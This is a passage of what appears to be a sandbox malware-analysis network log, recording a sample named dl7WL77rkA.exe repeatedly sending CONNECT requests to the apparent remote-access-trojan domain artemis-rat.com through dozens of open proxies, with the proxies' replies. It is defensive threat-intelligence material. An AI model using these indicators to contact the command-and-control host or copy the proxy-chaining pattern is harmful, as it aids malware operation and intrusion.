Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.702657938 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.852288961 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
297192.168.2.55085223.227.38.230803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.838054895 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.992464066 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
298192.168.2.550668185.250.27.5431283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.838179111 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.561068058 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.969841957 CET | 39 | IN | HTTP/1.0 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
299192.168.2.5507155.196.111.30200603876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.838895082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            300192.168.2.550842104.25.194.175803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.838900089 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.993407011 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            301192.168.2.550631103.190.54.141803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.839229107 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            302192.168.2.550839165.227.0.192803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.840991974 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.311052084 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.858042002 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.951723099 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.217643023 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.505887032 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.797264099 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.217742920 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:01.014370918 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            303192.168.2.55084365.49.38.20231283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.843519926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:16.886677980 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:19.910579920 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:26.118601084 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:38.407006025 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:02.471137047 CET | 39 | IN | HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            304192.168.2.550755147.75.34.83100063876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.845004082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.150233984 CET | 65 | IN | HTTP/1.1 200 Connection Established
Proxy-Agent: Zscaler/6.3


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            305192.168.2.550722120.78.191.68803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.846055984 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.180461884 CET | 767 | IN | HTTP/1.1 403 Forbidden
Server: Beaver
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 635
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            306192.168.2.550028184.178.172.18152803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.850102901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            307192.168.2.550867104.20.89.77803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.850545883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.004708052 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            308192.168.2.55077572.195.34.35273603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.850619078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            309192.168.2.55081938.54.95.1931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.852996111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.072160959 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            310192.168.2.550868172.67.181.97803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.853615046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.008230925 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            311192.168.2.550733208.109.13.93537783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.864516973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.576708078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.607986927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806415081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.933809996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108243942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.311316013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.514471054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            312192.168.2.550712222.220.102.15980003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.872649908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.532429934 CET59INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: nginx


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
313192.168.2.550320107.152.98.541453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.874901056 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
314192.168.2.55076743.155.142.116156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.874914885 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
315192.168.2.550888104.16.108.42803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.875190973 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.030153036 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
316192.168.2.550760146.59.70.29522763876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.878540039 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.576710939 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.561100006 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.702220917 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.702126980 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.701939106 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.702217102 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:02.592696905 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
317192.168.2.550756103.89.4.16331283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.879856110 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.592372894 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.623595953 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.177617073 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
318192.168.2.550133162.240.39.58458403876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.884799004 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.995819092 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.997227907 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
319192.168.2.5507883.9.71.16731283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.890944004 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.246644974 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:39 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            320192.168.2.55076543.255.113.23280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.902782917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            321192.168.2.55073736.89.10.51442683876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.905483007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
